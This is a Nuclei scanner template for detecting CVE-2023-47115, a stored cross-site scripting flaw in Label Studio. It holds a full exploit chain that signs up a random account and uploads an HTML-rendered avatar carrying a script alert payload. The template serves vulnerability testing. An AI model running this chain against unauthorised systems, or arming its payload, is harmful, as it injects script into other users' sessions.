nuclei-templates/http/cves/2023/CVE-2023-47115.yaml

99 lines
3.3 KiB
YAML
Raw Normal View History

2024-01-29 16:49:31 +00:00
id: CVE-2023-47115
info:
2024-01-30 17:06:51 +00:00
name: Label Studio - Cross-Site Scripting
2024-01-29 16:49:31 +00:00
author: isacaya
severity: high
2024-01-30 07:55:56 +00:00
description: |
Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website.
2024-01-29 16:49:31 +00:00
impact: |
Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image.
remediation: |
Update to version 1.9.2.
reference:
- https://github.com/advisories/GHSA-q68h-xwq5-mm7x
2024-01-30 07:55:56 +00:00
- https://docs.djangoproject.com/en/4.2/ref/views/#serving-files-in-development
- https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/functions.py#L18-L49
- https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/urls.py#L25-L26
2024-01-30 17:06:51 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-47115
2024-01-29 16:49:31 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
cvss-score: 7.1
cve-id: CVE-2023-47115
cwe-id: CWE-79
2024-09-10 08:22:50 +00:00
cpe: cpe:2.3:a:humansignal:label_studio:*:*:*:*:*:*:*:*
2024-01-30 07:55:56 +00:00
metadata:
verified: true
max-request: 6
2024-01-30 07:55:56 +00:00
shodan-query: http.favicon.hash:-1649949475
2024-09-10 08:22:50 +00:00
product: label_studio
vendor: humansignal
2024-01-30 07:55:56 +00:00
tags: cve,cve2023,xss,authenticated,intrusive,label-studio
2024-01-29 16:49:31 +00:00
http:
- raw:
- |
GET /user/login/ HTTP/1.1
Host: {{Hostname}}
2024-01-30 17:06:51 +00:00
2024-01-29 16:49:31 +00:00
- |
POST /user/signup/?&next=/projects/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrfmiddlewaretoken={{csrftoken}}&email={{randstr_1}}%40{{randstr_1}}.{{randstr_1}}&password={{randstr_2}}&allow_newsletters=false
2024-01-30 17:06:51 +00:00
2024-01-29 16:49:31 +00:00
- |
GET /api/current-user/whoami HTTP/1.1
Host: {{Hostname}}
2024-01-30 17:06:51 +00:00
2024-01-29 16:49:31 +00:00
- |
POST /api/users/{{id}}/avatar/ HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytZZRQ9D2LS0PMsHF
------WebKitFormBoundarytZZRQ9D2LS0PMsHF
Content-Disposition: form-data; name="avatar"; filename="nuclei.html"
Content-Type: image/png
{{hex_decode("89504E470D0A1A0A0000000D4948445200000009000000080802000000A4AF42E200000046494441543C7363726970743E616C65727428646F63756D656E742E646F6D61696E293C2F7363726970743E")}}
------WebKitFormBoundarytZZRQ9D2LS0PMsHF
2024-01-30 17:06:51 +00:00
2024-01-29 16:49:31 +00:00
- |
GET /api/current-user/whoami HTTP/1.1
Host: {{Hostname}}
2024-01-30 17:06:51 +00:00
2024-01-29 16:49:31 +00:00
- |
GET {{filename}} HTTP/1.1
Host: {{Hostname}}
extractors:
- type: xpath
name: csrftoken
internal: true
attribute: value
xpath:
- '/html/body/div/form/input'
2024-01-30 07:55:56 +00:00
2024-01-29 16:49:31 +00:00
- type: json
part: body
name: id
internal: true
json:
- '.id'
2024-01-30 07:55:56 +00:00
2024-01-29 16:49:31 +00:00
- type: json
part: body
name: filename
internal: true
json:
- '.avatar'
matchers:
- type: dsl
dsl:
- "status_code == 200"
2024-01-30 17:06:51 +00:00
- "contains(header, 'text/html')"
2024-01-29 16:49:31 +00:00
- 'contains(body, "<script>alert(document.domain)</script>")'
2024-01-30 07:55:56 +00:00
condition: and
2024-09-12 05:14:01 +00:00
# digest: 4a0a004730450221008a63bf96e345223566ebd44b47722d812ed3a0110ed507d07a2cf17bc1e91dd202200d10988de354df6f1b79559526e95dda1561688659e7bf72249417d044c950e6:922c64590222798bb761d5b6d8e72950